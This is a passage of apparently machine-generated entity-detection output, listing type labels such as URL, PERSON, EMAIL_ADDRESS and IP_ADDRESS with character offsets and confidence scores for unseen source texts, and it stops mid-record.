type: URL, start: 54173, end: 54180, score: 0.5, type: URL, start: 54530, end: 54536, score: 0.5, type: URL, start: 54590, end: 54596, score: 0.5, type: URL, start: 54771, end: 54777, score: 0.5, 
type: URL, start: 54781, end: 54788, score: 0.5, type: URL, start: 54795, end: 54802, score: 0.5, type: URL, start: 54830, end: 54837, score: 0.5, type: URL, start: 54856, end: 54862, score: 0.5, type: URL, start: 54895, end: 54901, score: 0.5, type: URL, start: 54930, end: 54936, score: 0.5, type: URL, start: 54966, end: 54972, score: 0.5, type: URL, start: 55097, end: 55103, score: 0.5, type: URL, start: 55107, end: 55114, score: 0.5, type: URL, start: 55121, end: 55128, score: 0.5, type: URL, start: 55156, end: 55163, score: 0.5, type: URL, start: 55166, end: 55175, score: 0.5, type: URL, start: 55198, end: 55204, score: 0.5, type: URL, start: 55237, end: 55243, score: 0.5, type: URL, start: 55289, end: 55295, score: 0.5, type: URL, start: 55428, end: 55434, score: 0.5, type: URL, start: 55438, end: 55445, score: 0.5, type: URL, start: 55452, end: 55459, score: 0.5, type: URL, start: 55482, end: 55488, score: 0.5, type: URL, start: 56080, end: 56085, score: 0.5, type: URL, start: 56115, end: 56126, score: 0.5, type: URL, start: 56213, end: 56218, score: 0.5, type: URL, start: 56270, end: 56280, score: 0.5, type: URL, start: 56400, end: 56410, score: 0.5, type: URL, start: 56429, end: 56434, score: 0.5, type: URL, start: 56483, end: 56493, score: 0.5, type: URL, start: 57063, end: 57070, score: 0.5, type: URL, start: 57113, end: 57119, score: 0.5, type: URL, start: 57289, end: 57296, score: 0.5, type: URL, start: 57470, end: 57476, score: 0.5, type: URL, start: 57521, end: 57527, score: 0.5, type: URL, start: 57564, end: 57570, score: 0.5, type: URL, start: 57604, end: 57610, score: 0.5, type: URL, start: 57638, end: 57644, score: 0.5, type: URL, start: 57687, end: 57694, score: 0.5, type: URL, start: 57729, end: 57735, score: 0.5, type: URL, start: 57772, end: 57778, score: 0.5, type: URL, start: 57798, end: 57804, score: 0.5, type: URL, start: 58242, end: 58248, score: 0.5, type: URL, start: 58283, end: 58289, score: 0.5, type: URL, start: 58370, end: 58376, score: 0.5, type: URL, start: 58392, end: 58398, score: 0.5, type: URL, start: 58436, end: 58442, score: 0.5, type: URL, start: 58549, end: 58555, score: 0.5, type: PERSON, start: 103, end: 112, score: 0.85, type: PERSON, start: 190, end: 201, score: 0.85, type: PERSON, start: 203, end: 216, score: 0.85, type: PERSON, start: 347, end: 351, score: 0.85, type: PERSON, start: 353, end: 362, score: 0.85, type: PERSON, start: 459, end: 467, score: 0.85, type: PERSON, start: 617, end: 635, score: 0.85, type: PERSON, start: 638, end: 646, score: 0.85, type: PERSON, start: 928, end: 937, score: 0.85, type: PERSON, start: 1008, end: 1013, score: 0.85, type: PERSON, start: 1015, end: 1025, score: 0.85, type: PERSON, start: 1077, end: 1095, score: 0.85, type: PERSON, start: 1125, end: 1130, score: 0.85, type: PERSON, start: 1139, end: 1143, score: 0.85, type: PERSON, start: 1224, end: 1228, score: 0.85, type: PERSON, start: 1261, end: 1266, score: 0.85, type: PERSON, start: 1463, end: 1472, score: 0.85, type: LOCATION, start: 1587, end: 1593, score: 0.85, type: PERSON, start: 1611, end: 1644, score: 0.85, type: PERSON, start: 1699, end: 1708, score: 0.85, type: PERSON, start: 1729, end: 1741, score: 0.85, type: NRP, start: 1813, end: 1820, score: 0.85, type: PERSON, start: 1891, end: 1911, score: 0.85, type: PERSON, start: 2337, end: 2346, score: 0.85, type: PERSON, start: 2393, end: 2405, score: 0.85, type: PERSON, start: 2452, end: 2467, score: 0.85, type: PERSON, start: 2742, end: 2751, score: 0.85, type: PERSON, start: 2865, end: 2874, 
score: 0.85, type: PERSON, start: 2891, end: 2896, score: 0.85, type: PERSON, start: 3012, end: 3017, score: 0.85, type: NRP, start: 3027, end: 3035, score: 0.85, type: PERSON, start: 3043, end: 3053, score: 0.85, type: PERSON, start: 3189, end: 3194, score: 0.85, type: PERSON, start: 3202, end: 3209, score: 0.85, type: PERSON, start: 3563, end: 3572, score: 0.85, type: URL, start: 741, end: 822, score: 0.6, type: URL, start: 838, end: 882, score: 0.6, type: URL, start: 1303, end: 1319, score: 0.6, type: URL, start: 1356, end: 1400, score: 0.6, type: URL, start: 2097, end: 2231, score: 0.6, type: URL, start: 2247, end: 2291, score: 0.6, type: URL, start: 2570, end: 2629, score: 0.6, type: URL, start: 2645, end: 2689, score: 0.6, type: URL, start: 3362, end: 3444, score: 0.6, type: URL, start: 3460, end: 3504, score: 0.6, type: URL, start: 4241, end: 4338, score: 0.6, type: URL, start: 4354, end: 4398, score: 0.6, type: URL, start: 156, end: 164, score: 0.5, type: URL, start: 978, end: 986, score: 0.5, type: URL, start: 1331, end: 1337, score: 0.5, type: URL, start: 1518, end: 1526, score: 0.5, type: URL, start: 2387, end: 2395, score: 0.5, type: URL, start: 2799, end: 2807, score: 0.5, type: URL, start: 3628, end: 3636, score: 0.5, type: URL, start: 4690, end: 4696, score: 0.5, type: EMAIL_ADDRESS, start: 627, end: 642, score: 1.0, type: URL, start: 709, end: 745, score: 0.95, type: PERSON, start: 336, end: 342, score: 0.85, type: PERSON, start: 589, end: 599, score: 0.85, type: PERSON, start: 1532, end: 1536, score: 0.85, type: IP_ADDRESS, start: 1072, end: 1073, score: 0.6, type: IP_ADDRESS, start: 1102, end: 1106, score: 0.6, type: URL, start: 148, end: 160, score: 0.5, type: URL, start: 424, end: 433, score: 0.5, type: URL, start: 439, end: 448, score: 0.5, type: URL, start: 478, end: 487, score: 0.5, type: URL, start: 515, end: 522, score: 0.5, type: URL, start: 633, end: 642, score: 0.5, type: URL, start: 1627, end: 1634, score: 0.5, type: URL, start: 1834, end: 1848, score: 0.5, type: URL, start: 1878, end: 1883, score: 0.5, type: EMAIL_ADDRESS, start: 342, end: 371, score: 1.0, type: EMAIL_ADDRESS, start: 373, end: 388, score: 1.0, type: EMAIL_ADDRESS, start: 436, end: 469, score: 1.0, type: EMAIL_ADDRESS, start: 471, end: 486, score: 1.0, type: PERSON, start: 305, end: 323, score: 0.85, type: PERSON, start: 325, end: 336, score: 0.85, type: PERSON, start: 395, end: 417, score: 0.85, type: PERSON, start: 419, end: 430, score: 0.85, type: URL, start: 517, end: 563, score: 0.6, type: IP_ADDRESS, start: 1461, end: 1462, score: 0.6, type: IP_ADDRESS, start: 1474, end: 1478, score: 0.6, type: URL, start: 135, end: 145, score: 0.5, type: URL, start: 148, end: 153, score: 0.5, type: URL, start: 365, end: 371, score: 0.5, type: URL, start: 379, end: 388, score: 0.5, type: URL, start: 463, end: 469, score: 0.5, type: URL, start: 477, end: 486, score: 0.5, type: URL, start: 703, end: 712, score: 0.5, type: URL, start: 760, end: 773, score: 0.5, type: URL, start: 1573, end: 1586, score: 0.5, type: EMAIL_ADDRESS, start: 1972, end: 1987, score: 1.0, type: EMAIL_ADDRESS, start: 2654, end: 2669, score: 1.0, type: LOCATION, start: 1035, end: 1052, score: 0.85, type: PERSON, start: 1301, end: 1315, score: 0.85, type: PERSON, start: 1682, end: 1685, score: 0.85, type: PERSON, start: 1920, end: 1936, score: 0.85, type: PERSON, start: 2364, end: 2367, score: 0.85, type: PERSON, start: 2602, end: 2618, score: 0.85, type: PERSON, start: 2754, end: 2769, score: 0.85, type: DATE_TIME, start: 4263, end: 
4272, score: 0.85, type: LOCATION, start: 4482, end: 4494, score: 0.85, type: LOCATION, start: 4497, end: 4533, score: 0.85, type: PERSON, start: 5968, end: 5972, score: 0.85, type: PERSON, start: 8666, end: 8670, score: 0.85, type: LOCATION, start: 9615, end: 9627, score: 0.85, type: PERSON, start: 11352, end: 11376, score: 0.85, type: URL, start: 170, end: 198, score: 0.6, type: URL, start: 250, end: 265, score: 0.5, type: URL, start: 287, end: 294, score: 0.5, type: URL, start: 346, end: 376, score: 0.5, type: URL, start: 515, end: 525, score: 0.5, type: URL, start: 962, end: 980, score: 0.5, type: URL, start: 1160, end: 1190, score: 0.5, type: URL, start: 1301, end: 1309, score: 0.5, type: URL, start: 1978, end: 1987, score: 0.5, type: URL, start: 2660, end: 2669, score: 0.5, type: URL, start: 2770, end: 2778, score: 0.5, type: URL, start: 3147, end: 3155, score: 0.5, type: URL, start: 3341, end: 3351, score: 0.5, type: URL, start: 3468, end: 3477, score: 0.5, type: URL, start: 3580, end: 3599, score: 0.5, type: URL, start: 3794, end: 3812, score: 0.5, type: URL, start: 3924, end: 3933, score: 0.5, type: URL, start: 3972, end: 3991, score: 0.5, type: URL, start: 4005, end: 4023, score: 0.5, type: URL, start: 4191, end: 4198, score: 0.5, type: URL, start: 4239, end: 4246, score: 0.5, type: URL, start: 11894, end: 11901, score: 0.5, type: URL, start: 12132, end: 12143, score: 0.5, type: URL, start: 12287, end: 12294, score: 0.5, type: URL, start: 12348, end: 12355, score: 0.5, type: URL, start: 12436, end: 12447, score: 0.5, type: EMAIL_ADDRESS, start: 226, end: 241, score: 1.0, type: DATE_TIME, start: 120, end: 124, score: 0.85, type: PERSON, start: 126, end: 144, score: 0.85, type: PERSON, start: 206, end: 224, score: 0.85, type: PERSON, start: 497, end: 501, score: 0.85, type: PERSON, start: 506, end: 510, score: 0.85, type: PERSON, start: 796, end: 800, score: 0.85, type: URL, start: 232, end: 241, score: 0.5, type: URL, start: 820, end: 826, score: 0.5, type: URL, start: 831, end: 837, score: 0.5, type: URL, start: 859, end: 865, score: 0.5, type: URL, start: 870, end: 876, score: 0.5, type: URL, start: 898, end: 904, score: 0.5, type: URL, start: 909, end: 915, score: 0.5, type: URL, start: 937, end: 943, score: 0.5, type: URL, start: 948, end: 954, score: 0.5, type: URL, start: 976, end: 982, score: 0.5, type: URL, start: 987, end: 993, score: 0.5, type: URL, start: 1015, end: 1021, score: 0.5, type: URL, start: 1026, end: 1032, score: 0.5, type: URL, start: 1054, end: 1060, score: 0.5, type: URL, start: 1065, end: 1071, score: 0.5, type: URL, start: 1093, end: 1099, score: 0.5, type: URL, start: 1104, end: 1110, score: 0.5, type: URL, start: 1132, end: 1138, score: 0.5, type: URL, start: 1143, end: 1149, score: 0.5, type: URL, start: 1171, end: 1177, score: 0.5, type: URL, start: 1182, end: 1188, score: 0.5, type: URL, start: 1210, end: 1216, score: 0.5, type: URL, start: 1221, end: 1227, score: 0.5, type: URL, start: 1249, end: 1255, score: 0.5, type: URL, start: 1260, end: 1266, score: 0.5, type: URL, start: 1288, end: 1294, score: 0.5, type: URL, start: 1299, end: 1305, score: 0.5, type: URL, start: 1327, end: 1333, score: 0.5, type: URL, start: 1338, end: 1344, score: 0.5, type: URL, start: 1367, end: 1373, score: 0.5, type: URL, start: 1378, end: 1384, score: 0.5, type: URL, start: 1408, end: 1414, score: 0.5, type: URL, start: 1419, end: 1425, score: 0.5, type: URL, start: 1447, end: 1453, score: 0.5, type: URL, start: 1458, end: 1464, score: 0.5, type: URL, start: 1486, 
end: 1492, score: 0.5, type: URL, start: 1497, end: 1503, score: 0.5, type: URL, start: 1525, end: 1531, score: 0.5, type: URL, start: 1536, end: 1542, score: 0.5, type: URL, start: 1565, end: 1571, score: 0.5, type: URL, start: 1576, end: 1582, score: 0.5, type: URL, start: 1604, end: 1610, score: 0.5, type: URL, start: 1615, end: 1621, score: 0.5, type: URL, start: 1643, end: 1649, score: 0.5, type: URL, start: 1654, end: 1660, score: 0.5, type: URL, start: 1683, end: 1689, score: 0.5, type: URL, start: 1694, end: 1700, score: 0.5, type: URL, start: 1723, end: 1729, score: 0.5, type: URL, start: 1734, end: 1740, score: 0.5, type: URL, start: 1764, end: 1770, score: 0.5, type: URL, start: 1775, end: 1781, score: 0.5, type: URL, start: 1805, end: 1811, score: 0.5, type: URL, start: 1816, end: 1822, score: 0.5, type: EMAIL_ADDRESS, start: 251, end: 266, score: 1.0, type: PERSON, start: 234, end: 249, score: 0.85, type: NRP, start: 432, end: 440, score: 0.85, type: PERSON, start: 628, end: 635, score: 0.85, type: PERSON, start: 1349, end: 1373, score: 0.85, type: DATE_TIME, start: 2730, end: 2740, score: 0.85, type: PERSON, start: 3429, end: 3452, score: 0.85, type: LOCATION, start: 3830, end: 3838, score: 0.85, type: NRP, start: 4347, end: 4370, score: 0.85, type: LOCATION, start: 4480, end: 4482, score: 0.85, type: PERSON, start: 7295, end: 7302, score: 0.85, type: PERSON, start: 9834, end: 9841, score: 0.85, type: NRP, start: 13314, end: 13328, score: 0.85, type: PERSON, start: 14281, end: 14295, score: 0.85, type: PERSON, start: 15102, end: 15119, score: 0.85, type: URL, start: 192, end: 220, score: 0.6, type: URL, start: 1154, end: 1214, score: 0.6, type: URL, start: 257, end: 266, score: 0.5, type: URL, start: 664, end: 671, score: 0.5, type: URL, start: 732, end: 738, score: 0.5, type: URL, start: 769, end: 775, score: 0.5, type: URL, start: 1967, end: 1973, score: 0.5, type: URL, start: 1987, end: 1993, score: 0.5, type: URL, start: 2019, end: 2025, score: 0.5, type: URL, start: 2040, end: 2051, score: 0.5, type: URL, start: 2074, end: 2080, score: 0.5, type: URL, start: 2573, end: 2593, score: 0.5, type: URL, start: 2613, end: 2625, score: 0.5, type: URL, start: 2650, end: 2662, score: 0.5, type: URL, start: 2672, end: 2684, score: 0.5, type: URL, start: 2711, end: 2717, score: 0.5, type: URL, start: 2872, end: 2884, score: 0.5, type: URL, start: 2952, end: 2964, score: 0.5, type: URL, start: 3047, end: 3059, score: 0.5, type: URL, start: 3122, end: 3133, score: 0.5, type: URL, start: 3154, end: 3166, score: 0.5, type: URL, start: 3168, end: 3179, score: 0.5, type: URL, start: 3376, end: 3382, score: 0.5, type: URL, start: 3388, end: 3394, score: 0.5, type: URL, start: 3501, end: 3507, score: 0.5, type: URL, start: 3840, end: 3846, score: 0.5, type: URL, start: 3855, end: 3861, score: 0.5, type: URL, start: 3919, end: 3925, score: 0.5, type: URL, start: 4711, end: 4722, score: 0.5, type: URL, start: 4772, end: 4783, score: 0.5, type: URL, start: 4829, end: 4840, score: 0.5, type: URL, start: 4894, end: 4905, score: 0.5, type: URL, start: 5379, end: 5390, score: 0.5, type: URL, start: 5545, end: 5556, score: 0.5, type: URL, start: 5613, end: 5624, score: 0.5, type: URL, start: 6306, end: 6312, score: 0.5, type: URL, start: 6461, end: 6469, score: 0.5, type: URL, start: 7204, end: 7210, score: 0.5, type: URL, start: 7215, end: 7221, score: 0.5, type: URL, start: 7328, end: 7341, score: 0.5, type: URL, start: 8343, end: 8349, score: 0.5, type: URL, start: 8552, end: 8561, score: 0.5, 
type: URL, start: 8579, end: 8585, score: 0.5, type: URL, start: 8790, end: 8803, score: 0.5, type: URL, start: 9867, end: 9880, score: 0.5, type: URL, start: 10899, end: 10905, score: 0.5, type: URL, start: 11108, end: 11117, score: 0.5, type: URL, start: 11135, end: 11141, score: 0.5, type: URL, start: 11346, end: 11359, score: 0.5, type: URL, start: 12445, end: 12451, score: 0.5, type: URL, start: 12467, end: 12473, score: 0.5, type: URL, start: 12525, end: 12531, score: 0.5, type: URL, start: 12536, end: 12542, score: 0.5, type: URL, start: 13314, end: 13320, score: 0.5, type: URL, start: 13393, end: 13406, score: 0.5, type: URL, start: 13535, end: 13548, score: 0.5, type: URL, start: 13953, end: 13960, score: 0.5, type: URL, start: 14009, end: 14019, score: 0.5, type: URL, start: 14054, end: 14061, score: 0.5, type: URL, start: 14068, end: 14078, score: 0.5, type: URL, start: 14082, end: 14089, score: 0.5, type: URL, start: 14113, end: 14120, score: 0.5, type: URL, start: 14201, end: 14215, score: 0.5, type: URL, start: 14255, end: 14264, score: 0.5, type: URL, start: 14281, end: 14290, score: 0.5, type: URL, start: 14348, end: 14354, score: 0.5, type: URL, start: 14384, end: 14391, score: 0.5, type: URL, start: 14401, end: 14411, score: 0.5, type: URL, start: 14467, end: 14476, score: 0.5, type: URL, start: 14487, end: 14498, score: 0.5, type: URL, start: 14505, end: 14516, score: 0.5, type: URL, start: 14528, end: 14539, score: 0.5, type: URL, start: 14706, end: 14713, score: 0.5, type: URL, start: 14760, end: 14767, score: 0.5, type: URL, start: 14810, end: 14819, score: 0.5, type: URL, start: 14839, end: 14846, score: 0.5, type: URL, start: 14862, end: 14871, score: 0.5, type: URL, start: 14881, end: 14890, score: 0.5, type: URL, start: 14931, end: 14938, score: 0.5, type: URL, start: 14991, end: 14997, score: 0.5, type: URL, start: 15142, end: 15151, score: 0.5, type: URL, start: 15155, end: 15164, score: 0.5, type: URL, start: 15172, end: 15181, score: 0.5, type: URL, start: 15185, end: 15194, score: 0.5, type: URL, start: 15265, end: 15270, score: 0.5, type: URL, start: 15297, end: 15308, score: 0.5, type: URL, start: 15347, end: 15358, score: 0.5, type: URL, start: 15367, end: 15378, score: 0.5, type: URL, start: 15413, end: 15424, score: 0.5, type: URL, start: 15762, end: 15768, score: 0.5, type: URL, start: 15780, end: 15786, score: 0.5, type: EMAIL_ADDRESS, start: 85, end: 100, score: 1.0, type: DATE_TIME, start: 61, end: 65, score: 0.85, type: PERSON, start: 67, end: 84, score: 0.85, type: DATE_TIME, start: 1401, end: 1429, score: 0.85, type: URL, start: 731, end: 759, score: 0.6, type: URL, start: 91, end: 100, score: 0.5, type: URL, start: 781, end: 791, score: 0.5, type: URL, start: 1205, end: 1221, score: 0.5, type: URL, start: 1360, end: 1368, score: 0.5, type: URL, start: 1495, end: 1503, score: 0.5, type: URL, start: 1512, end: 1520, score: 0.5, type: URL, start: 1661, end: 1668, score: 0.5, type: URL, start: 1705, end: 1713, score: 0.5, type: URL, start: 1722, end: 1730, score: 0.5, type: URL, start: 1872, end: 1881, score: 0.5, type: URL, start: 1933, end: 1941, score: 0.5, type: URL, start: 1972, end: 1980, score: 0.5, type: URL, start: 1988, end: 1996, score: 0.5, type: URL, start: 2020, end: 2028, score: 0.5, type: LOCATION, start: 54, end: 58, score: 0.85, type: LOCATION, start: 539, end: 547, score: 0.85, type: LOCATION, start: 934, end: 942, score: 0.85, type: PERSON, start: 1889, end: 1897, score: 0.85, type: PERSON, start: 2528, end: 2535, score: 0.85, 
type: PERSON, start: 2641, end: 2648, score: 0.85, type: PERSON, start: 3898, end: 3907, score: 0.85, type: LOCATION, start: 5026, end: 5032, score: 0.85, type: PERSON, start: 5172, end: 5186, score: 0.85, type: IP_ADDRESS, start: 4525, end: 4534, score: 0.6, type: IP_ADDRESS, start: 5159, end: 5168, score: 0.6, type: URL, start: 92, end: 98, score: 0.5, type: URL, start: 282, end: 300, score: 0.5, type: URL, start: 397, end: 415, score: 0.5, type: URL, start: 500, end: 510, score: 0.5, type: URL, start: 895, end: 905, score: 0.5, type: URL, start: 1040, end: 1047, score: 0.5, type: URL, start: 1130, end: 1141, score: 0.5, type: URL, start: 1155, end: 1162, score: 0.5, type: URL, start: 1329, end: 1344, score: 0.5, type: URL, start: 1356, end: 1367, score: 0.5, type: URL, start: 1379, end: 1386, score: 0.5, type: URL, start: 1428, end: 1435, score: 0.5, type: URL, start: 1466, end: 1477, score: 0.5, type: URL, start: 1585, end: 1592, score: 0.5, type: URL, start: 1649, end: 1656, score: 0.5, type: URL, start: 1685, end: 1691, score: 0.5, type: URL, start: 1826, end: 1832, score: 0.5, type: URL, start: 1876, end: 1891, score: 0.5, type: URL, start: 1976, end: 1991, score: 0.5, type: URL, start: 2108, end: 2119, score: 0.5, type: URL, start: 2137, end: 2148, score: 0.5, type: URL, start: 2350, end: 2361, score: 0.5, type: URL, start: 2408, end: 2415, score: 0.5, type: URL, start: 2548, end: 2553, score: 0.5, type: URL, start: 2562, end: 2567, score: 0.5, type: URL, start: 2615, end: 2620, score: 0.5, type: URL, start: 2696, end: 2700, score: 0.5, type: URL, start: 2707, end: 2718, score: 0.5, type: URL, start: 3176, end: 3183, score: 0.5, type: URL, start: 3317, end: 3328, score: 0.5, type: URL, start: 3390, end: 3401, score: 0.5, type: URL, start: 3523, end: 3534, score: 0.5, type: URL, start: 3689, end: 3700, score: 0.5, type: URL, start: 3868, end: 3875, score: 0.5, type: URL, start: 3945, end: 3955, score: 0.5, type: URL, start: 3986, end: 4002, score: 0.5, type: URL, start: 4037, end: 4053, score: 0.5, type: URL, start: 4114, end: 4121, score: 0.5, type: URL, start: 4348, end: 4355, score: 0.5, type: URL, start: 4415, end: 4426, score: 0.5, type: URL, start: 4462, end: 4471, score: 0.5, type: URL, start: 4506, end: 4511, score: 0.5, type: URL, start: 4557, end: 4566, score: 0.5, type: URL, start: 4601, end: 4606, score: 0.5, type: URL, start: 4666, end: 4675, score: 0.5, type: URL, start: 4705, end: 4710, score: 0.5, type: URL, start: 4811, end: 4820, score: 0.5, type: URL, start: 4943, end: 4952, score: 0.5, type: URL, start: 4984, end: 4989, score: 0.5, type: URL, start: 5094, end: 5103, score: 0.5, type: URL, start: 5136, end: 5141, score: 0.5, type: URL, start: 5215, end: 5224, score: 0.5, type: URL, start: 5317, end: 5326, score: 0.5, type: URL, start: 5342, end: 5349, score: 0.5, type: URL, start: 5358, end: 5368, score: 0.5, type: URL, start: 5384, end: 5394, score: 0.5, type: URL, start: 5408, end: 5418, score: 0.5, type: URL, start: 5434, end: 5444, score: 0.5, type: URL, start: 5455, end: 5465, score: 0.5, type: URL, start: 5514, end: 5520, score: 0.5, type: URL, start: 5583, end: 5589, score: 0.5, type: IP_ADDRESS, start: 95252, end: 95261, score: 0.95, type: IP_ADDRESS, start: 96314, end: 96323, score: 0.95, type: DATE_TIME, start: 81, end: 90, score: 0.85, type: PERSON, start: 1077, end: 1097, score: 0.85, type: PERSON, start: 1112, end: 1118, score: 0.85, type: PERSON, start: 1124, end: 1144, score: 0.85, type: PERSON, start: 1437, end: 1444, score: 0.85, type: PERSON, 
start: 1528, end: 1546, score: 0.85, type: PERSON, start: 1804, end: 1812, score: 0.85, type: PERSON, start: 3377, end: 3385, score: 0.85, type: LOCATION, start: 3534, end: 3547, score: 0.85, type: PERSON, start: 4731, end: 4734, score: 0.85, type: PERSON, start: 4738, end: 4741, score: 0.85, type: PERSON, start: 5121, end: 5124, score: 0.85, type: LOCATION, start: 5429, end: 5437, score: 0.85, type: LOCATION, start: 6751, end: 6759, score: 0.85, type: LOCATION, start: 8096, end: 8104, score: 0.85, type: PERSON, start: 8824, end: 8827, score: 0.85, type: PERSON, start: 8834, end: 8837, score: 0.85, type: LOCATION, start: 8991, end: 8999, score: 0.85, type: PERSON, start: 14294, end: 14297, score: 0.85, type: PERSON, start: 14341, end: 14344, score: 0.85, type: PERSON, start: 14989, end: 14992, score: 0.85, type: PERSON, start: 15036, end: 15039, score: 0.85, type: PERSON, start: 16452, end: 16457, score: 0.85, type: PERSON, start: 17105, end: 17110, score: 0.85, type: PERSON, start: 17509, end: 17517, score: 0.85, type: PERSON, start: 17904, end: 17907, score: 0.85, type: PERSON, start: 17971, end: 17974, score: 0.85, type: URL, start: 18395, end: 18402, score: 0.85, type: URL, start: 18861, end: 18868, score: 0.85, type: URL, start: 19003, end: 19010, score: 0.85, type: URL, start: 19140, end: 19147, score: 0.85, type: URL, start: 19188, end: 19195, score: 0.85, type: PERSON, start: 19526, end: 19529, score: 0.85, type: PERSON, start: 19593, end: 19596, score: 0.85, type: PERSON, start: 46234, end: 46237, score: 0.85, type: PERSON, start: 47167, end: 47170, score: 0.85, type: PERSON, start: 47223, end: 47226, score: 0.85, type: PERSON, start: 51294, end: 51297, score: 0.85, type: PERSON, start: 51346, end: 51349, score: 0.85, type: LOCATION, start: 55527, end: 55552, score: 0.85, type: URL, start: 56502, end: 56508, score: 0.85, type: PERSON, start: 63226, end: 63257, score: 0.85, type: NRP, start: 70531, end: 70540, score: 0.85, type: NRP, start: 70975, end: 70984, score: 0.85, type: PERSON, start: 71967, end: 71985, score: 0.85, type: NRP, start: 72508, end: 72517, score: 0.85, type: PERSON, start: 72839, end: 72857, score: 0.85, type: PERSON, start: 73470, end: 73488, score: 0.85, type: PERSON, start: 75104, end: 75122, score: 0.85, type: PERSON, start: 76457, end: 76475, score: 0.85, type: PERSON, start: 77091, end: 77109, score: 0.85, type: PERSON, start: 77677, end: 77695, score: 0.85, type: PERSON, start: 79595, end: 79613, score: 0.85, type: PERSON, start: 80057, end: 80075, score: 0.85, type: PERSON, start: 80519, end: 80537, score: 0.85, type: PERSON, start: 80986, end: 81004, score: 0.85, type: DATE_TIME, start: 83103, end: 83133, score: 0.85, type: DATE_TIME, start: 83869, end: 83899, score: 0.85, type: DATE_TIME, start: 84985, end: 85015, score: 0.85, type: PERSON, start: 85721, end: 85739, score: 0.85, type: PERSON, start: 86172, end: 86188, score: 0.85, type: DATE_TIME, start: 86189, end: 86219, score: 0.85, type: PERSON, start: 86642, end: 86658, score: 0.85, type: PERSON, start: 86659, end: 86677, score: 0.85, type: PERSON, start: 87024, end: 87042, score: 0.85, type: PERSON, start: 89645, end: 89660, score: 0.85, type: PERSON, start: 89722, end: 89731, score: 0.85, type: PERSON, start: 92533, end: 92539, score: 0.85, type: PERSON, start: 92864, end: 92871, score: 0.85, type: PERSON, start: 93427, end: 93434, score: 0.85, type: PERSON, start: 94494, end: 94501, score: 0.85, type: DATE_TIME, start: 95540, end: 95542, score: 0.85, type: DATE_TIME, start: 96654, end: 96656, 
score: 0.85, type: PERSON, start: 97048, end: 97090, score: 0.85, type: PERSON, start: 97508, end: 97550, score: 0.85, type: LOCATION, start: 97804, end: 97828, score: 0.85, type: LOCATION, start: 98268, end: 98294, score: 0.85, type: PERSON, start: 99298, end: 99301, score: 0.85, type: PERSON, start: 99357, end: 99360, score: 0.85, type: PERSON, start: 101409, end: 101420, score: 0.85, type: PERSON, start: 108182, end: 108193, score: 0.85, type: PERSON, start: 109031, end: 109042, score: 0.85, type: PERSON, start: 112843, end: 112854, score: 0.85, type: URL, start: 327, end: 369, score: 0.6, type: URL, start: 10450, end: 10483, score: 0.6, type: URL, start: 11127, end: 11160, score: 0.6, type: URL, start: 23569, end: 23599, score: 0.6, type: URL, start: 26417, end: 26442, score: 0.6, type: URL, start: 27239, end: 27264, score: 0.6, type: IP_ADDRESS, start: 90874, end: 90883, score: 0.6, type: IP_ADDRESS, start: 92732, end: 92741, score: 0.6, type: IP_ADDRESS, start: 94844, end: 94853, score: 0.6, type: IP_ADDRESS, start: 95906, end: 95915, score: 0.6, type: URL, start: 781, end: 788, score: 0.5, type: URL, start: 868, end: 882, score: 0.5, type: URL, start: 991, end: 1001, score: 0.5, type: URL, start: 1029, end: 1045, score: 0.5, type: URL, start: 1057, end: 1066, score: 0.5, type: URL, start: 1177, end: 1197, score: 0.5, type: URL, start: 1223, end: 1243, score: 0.5, type: URL, start: 1271, end: 1286, score: 0.5, type: URL, start: 1433, end: 1439, score: 0.5, type: URL, start: 1455, end: 1467, score: 0.5, type: URL, start: 1542, end: 1549, score: 0.5, type: URL, start: 1687, end: 1694, score: 0.5, type: URL, start: 1701, end: 1710, score: 0.5, type: URL, start: 1777, end: 1784, score: 0.5, type: URL, start: 1799, end: 1806, score: 0.5, type: URL, start: 2992, end: 2999, score: 0.5, type: URL, start: 3007, end: 3024, score: 0.5, type: URL, start: 3063, end: 3069, score: 0.5, type: URL, start: 3093, end: 3099, score: 0.5, type: URL, start: 3118, end: 3125, score: 0.5, type: URL, start: 3150, end: 3157, score: 0.5, type: URL, start: 3293, end: 3300, score: 0.5, type: URL, start: 3372, end: 3379, score: 0.5, type: URL, start: 3402, end: 3408, score: 0.5, type: URL, start: 3419, end: 3426, score: 0.5, type: URL, start: 3822, end: 3831, score: 0.5, type: URL, start: 4138, end: 4146, score: 0.5, type: URL, start: 4177, end: 4183, score: 0.5, type: URL, start: 4225, end: 4235, score: 0.5, type: URL, start: 4292, end: 4298, score: 0.5, type: URL, start: 4327, end: 4334, score: 0.5, type: URL, start: 4345, end: 4351, score: 0.5, type: URL, start: 4396, end: 4402, score: 0.5, type: URL, start: 4423, end: 4430, score: 0.5, type: URL, start: 4488, end: 4495, score: 0.5, type: URL, start: 5152, end: 5160, score: 0.5, type: URL, start: 5191, end: 5197, score: 0.5, type: URL, start: 5239, end: 5249, score: 0.5, type: URL, start: 5306, end: 5312, score: 0.5, type: URL, start: 5341, end: 5348, score: 0.5, type: URL, start: 5359, end: 5365, score: 0.5, type: URL, start: 5388, end: 5395, score: 0.5, type: URL, start: 5429, end: 5435, score: 0.5, type: URL, start: 5439, end: 5445, score: 0.5, type: URL, start: 5506, end: 5513, score: 0.5, type: URL, start: 5848, end: 5856, score: 0.5, type: URL, start: 5887, end: 5893, score: 0.5, type: URL, start: 5935, end: 5945, score: 0.5, type: URL, start: 6002, end: 6008, score: 0.5, type: URL, start: 6037, end: 6044, score: 0.5, type: URL, start: 6055, end: 6061, score: 0.5, type: URL, start: 6132, end: 6139, score: 0.5, type: URL, start: 6474, end: 6482, score: 0.5, 
type: URL, start: 6513, end: 6519, score: 0.5, type: URL, start: 6561, end: 6571, score: 0.5, type: URL, start: 6628, end: 6634, score: 0.5, type: URL, start: 6663, end: 6670, score: 0.5, type: URL, start: 6681, end: 6687, score: 0.5, type: URL, start: 6710, end: 6717, score: 0.5, type: URL, start: 6751, end: 6757, score: 0.5, type: URL, start: 6761, end: 6767, score: 0.5, type: URL, start: 6833, end: 6840, score: 0.5, type: URL, start: 7179, end: 7187, score: 0.5, type: URL, start: 7218, end: 7224, score: 0.5, type: URL, start: 7266, end: 7276, score: 0.5, type: URL, start: 7333, end: 7339, score: 0.5, type: URL, start: 7368, end: 7375, score: 0.5, type: URL, start: 7386, end: 7392, score: 0.5, type: URL, start: 7468, end: 7475, score: 0.5, type: URL, start: 7814, end: 7822, score: 0.5, type: URL, start: 7853, end: 7859, score: 0.5, type: URL, start: 7901, end: 7911, score: 0.5, type: URL, start: 7968, end: 7974, score: 0.5, type: URL, start: 8003, end: 8010, score: 0.5, type: URL, start: 8021, end: 8027, score: 0.5, type: URL, start: 8050, 